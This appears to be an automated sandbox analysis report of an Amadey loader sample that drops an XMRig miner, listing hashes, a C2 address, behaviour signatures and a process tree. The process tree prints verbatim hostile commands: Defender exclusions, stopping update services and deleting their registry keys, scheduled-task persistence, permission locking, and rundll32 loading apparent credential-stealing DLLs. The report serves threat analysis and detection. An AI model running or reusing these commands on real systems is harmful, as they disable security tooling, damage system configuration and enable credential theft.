Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20230221-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27-03-2023 14:13
- Static task: static1
General
- Target: 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe
- Size: 4.3MB
- MD5: 2546be1f997c39b02143a5908ac7bec9
- SHA1: 7b6c80b8b0288ec37430a8c5662c1f92dd46f11d
- SHA256: 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2
- SHA512: 016a5fc1a01b4e35cbf7873d2aba6e8801551ed1d9764b35ea383def83e60b50ae779814c51981d55c9b098c5d33933e360a0752e3855ed9c64e790ba388d179
- SSDEEP: 98304:biv+VRRT1/DK/ff7HTK9sPxVV22fYe17DFFyGA4KhX:bi0P1/+/f7TK9sPxVI2N17DFFyGLOX
Malware Config
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
description | pid | process | target process
PID 2460 created 3244 | 2460 | XandETC.exe | Explorer.EXE
PID 2460 created 3244 | 2460 | XandETC.exe | Explorer.EXE
PID 2460 created 3244 | 2460 | XandETC.exe | Explorer.EXE
PID 2460 created 3244 | 2460 | XandETC.exe | Explorer.EXE
PID 2460 created 3244 | 2460 | XandETC.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
PID 4832 created 3244 | 4832 | conhost.exe | Explorer.EXE
PID 556 created 3244 | 556 | updater.exe | Explorer.EXE
-
XMRig Miner payload 7 IoCs
Processes:
resource | yara_rule
behavioral1/memory/644-330-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-333-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-334-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-336-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-340-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-343-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
behavioral1/memory/644-345-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | xmrig
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | Player3.exe
-
Executes dropped EXE 8 IoCs
Processes:
pid | process
2852 | Player3.exe
636 | ss31.exe
2460 | XandETC.exe
732 | nbveek.exe
2892 | nbveek.exe
556 | updater.exe
3608 | nbveek.exe
2148 | nbveek.exe
-
Loads dropped DLL 3 IoCs
Processes:
pid | process
3932 | rundll32.exe
2932 | rundll32.exe
3660 | rundll32.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
behavioral1/memory/644-330-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-333-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-334-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-336-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-340-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-343-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
behavioral1/memory/644-345-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp | upx
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | process | target process
PID 556 set thread context of 4832 | 556 | updater.exe | conhost.exe
PID 556 set thread context of 644 | 556 | updater.exe | conhost.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
1076 | sc.exe
3736 | sc.exe
3108 | sc.exe
1436 | sc.exe
1656 | sc.exe
4196 | sc.exe
2212 | sc.exe
3708 | sc.exe
812 | sc.exe
3036 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
1136 | 2932 | WerFault.exe | rundll32.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust 
powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
XandETC.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.execonhost.exepid process 2460 XandETC.exe 2460 XandETC.exe 2832 powershell.exe 2832 powershell.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 1792 powershell.exe 1792 powershell.exe 2460 XandETC.exe 2460 XandETC.exe 1664 powershell.exe 1664 powershell.exe 556 updater.exe 556 updater.exe 4416 powershell.exe 4416 powershell.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 3208 powershell.exe 3208 powershell.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 4832 conhost.exe 4832 conhost.exe 556 updater.exe 556 updater.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2832 powershell.exe Token: SeShutdownPrivilege 2312 powercfg.exe Token: SeCreatePagefilePrivilege 2312 powercfg.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeShutdownPrivilege 3476 powercfg.exe Token: SeCreatePagefilePrivilege 3476 powercfg.exe Token: SeShutdownPrivilege 552 powercfg.exe Token: SeCreatePagefilePrivilege 552 powercfg.exe Token: SeShutdownPrivilege 516 powercfg.exe Token: SeCreatePagefilePrivilege 516 powercfg.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeSystemEnvironmentPrivilege 1792 powershell.exe Token: SeRemoteShutdownPrivilege 1792 powershell.exe Token: SeUndockPrivilege 1792 powershell.exe Token: SeManageVolumePrivilege 1792 powershell.exe Token: 33 1792 powershell.exe Token: 34 1792 powershell.exe Token: 35 1792 powershell.exe Token: 36 1792 powershell.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 
powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeSystemEnvironmentPrivilege 1792 powershell.exe Token: SeRemoteShutdownPrivilege 1792 powershell.exe Token: SeUndockPrivilege 1792 powershell.exe Token: SeManageVolumePrivilege 1792 powershell.exe Token: 33 1792 powershell.exe Token: 34 1792 powershell.exe Token: 35 1792 powershell.exe Token: 36 1792 powershell.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exePlayer3.exenbveek.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 636 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe ss31.exe PID 4772 wrote to memory of 636 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe ss31.exe PID 4772 wrote to memory of 2460 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe XandETC.exe PID 4772 wrote to memory of 2460 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe XandETC.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe 
cacls.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 2068 wrote to memory of 2312 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 2312 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 4196 2888 cmd.exe sc.exe PID 2888 wrote to memory of 4196 2888 cmd.exe sc.exe PID 2068 wrote to memory of 3476 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 3476 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 2212 2888 cmd.exe sc.exe PID 2888 wrote to memory of 2212 2888 cmd.exe sc.exe PID 2068 wrote to memory of 552 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 552 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 516 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 516 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 1076 2888 cmd.exe sc.exe PID 2888 wrote to memory of 1076 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3736 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3736 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3108 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3108 2888 cmd.exe sc.exe PID 2888 wrote to memory of 1088 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1088 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4356 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4356 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1428 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1428 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4580 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4580 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1264 2888 cmd.exe reg.exe PID 
2888 wrote to memory of 1264 2888 cmd.exe reg.exe PID 1664 wrote to memory of 1848 1664 powershell.exe schtasks.exe PID 1664 wrote to memory of 1848 1664 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXE | cmdline: C:\Windows\Explorer.EXE | level 1 | PID:3244
-
C:\Users\Admin\AppData\Local\Temp\24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe" | level 2
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\Player3.exe" | level 3
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" | level 4
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\schtasks.exe | cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F | level 5
- Creates scheduled task(s)
PID:5100 -
C:\Windows\SysWOW64\cmd.exe | cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit | level 5
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" | level 6 | PID:228
-
C:\Windows\SysWOW64\cacls.exe | cmdline: CACLS "nbveek.exe" /P "Admin:N" | level 6 | PID:2876
-
C:\Windows\SysWOW64\cacls.exe | cmdline: CACLS "nbveek.exe" /P "Admin:R" /E | level 6 | PID:2392
-
C:\Windows\SysWOW64\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" | level 6 | PID:4972
-
C:\Windows\SysWOW64\cacls.exe | cmdline: CACLS "..\16de06bfb4" /P "Admin:N" | level 6 | PID:1864
-
C:\Windows\SysWOW64\cacls.exe | cmdline: CACLS "..\16de06bfb4" /P "Admin:R" /E | level 6 | PID:1592
-
C:\Windows\SysWOW64\rundll32.exe | cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main | level 5
- Loads dropped DLL
PID:3932 -
C:\Windows\system32\rundll32.exe | cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main | level 6
- Loads dropped DLL
PID:2932 -
C:\Windows\system32\WerFault.exe | cmdline: C:\Windows\system32\WerFault.exe -u -p 2932 -s 644 | level 7
- Program crash
PID:1136 -
C:\Windows\SysWOW64\rundll32.exe | cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main | level 5
- Loads dropped DLL
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\ss31.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\ss31.exe" | level 3
- Executes dropped EXE
PID:636 -
C:\Users\Admin\AppData\Local\Temp\XandETC.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\XandETC.exe" | level 3
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force | level 2
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f | level 2
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\System32\sc.exe | cmdline: sc stop UsoSvc | level 3
- Launches sc.exe
PID:4196 -
C:\Windows\System32\sc.exe | cmdline: sc stop WaaSMedicSvc | level 3
- Launches sc.exe
PID:2212 -
C:\Windows\System32\sc.exe | cmdline: sc stop wuauserv | level 3
- Launches sc.exe
PID:1076 -
C:\Windows\System32\sc.exe | cmdline: sc stop bits | level 3
- Launches sc.exe
PID:3736 -
C:\Windows\System32\sc.exe | cmdline: sc stop dosvc | level 3
- Launches sc.exe
PID:3108 -
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f | level 3 | PID:1088
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f | level 3 | PID:4356
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f | level 3
- Modifies security service
PID:1428 -
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f | level 3 | PID:4580
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f | level 3 | PID:1264
-
